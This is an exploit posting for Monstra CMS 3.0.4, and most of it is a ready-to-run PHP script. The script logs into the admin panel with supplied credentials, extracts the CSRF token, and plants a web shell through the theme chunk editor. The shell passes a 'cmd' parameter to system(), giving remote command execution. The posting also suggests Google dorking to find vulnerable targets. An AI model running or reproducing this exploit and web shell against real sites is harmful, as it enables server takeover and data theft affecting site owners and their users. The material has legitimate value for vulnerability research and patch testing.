Monstra CMS 3.0.4 Shell Upload

=============================================================================================================================================
| # Title Monstra CMS 3.0.4 Shell Upload

=============================================================================================================================================
| # Title : Monstra CMS 3.0.4 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://monstra.org/monstra-3.0.4.zip |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

(Related : https://packetstorm.news/files/id/178893/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php <url> <username> <password>

[+] PayLoad :

<?php
if ($argc < 4) {
echo "Usage: php script.php <url> <username> <password>\n";
exit(1);
}

$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$session = curl_init();

$login_url = $base_url . '/admin/index.php?id=dashboard';
$login_data = [
'login' => $username,
'password' => $password,
'login_submit' => 'Log+In'
];

$filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 5);

echo "Logging in...\n";
curl_setopt($session, CURLOPT_URL, $login_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);

if (strpos($response, 'Dashboard') !== false) {
echo "Login successful\n";
} else {
echo "Login failed\n";
exit();
}

sleep(3);

$edit_url = $base_url . '/admin/index.php?id=themes&action=add_chunk';
curl_setopt($session, CURLOPT_URL, $edit_url);
$response = curl_exec($session);

preg_match('/input type="hidden" id="csrf" name="csrf" value="(.*?)"/', $response, $matches);
if ($matches) {
$token = $matches[1];
} else {
echo "CSRF token could not be found.\n";
exit();
}

$content = '
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>
</pre>
</body>
</html>
';

$edit_data = [
'csrf' => $token,
'name' => $filename,
'content' => $content,
'add_file' => 'Save'
];

echo "Preparing shell...\n";
curl_setopt($session, CURLOPT_URL, $edit_url);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($edit_data));
$response = curl_exec($session);
sleep(3);

if (curl_getinfo($session, CURLINFO_HTTP_CODE) == 200) {
echo "Your shell is ready: " . $base_url . "/public/themes/default/{$filename}.chunk.php\n";
} else {
echo "Failed to prepare shell.\n";
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================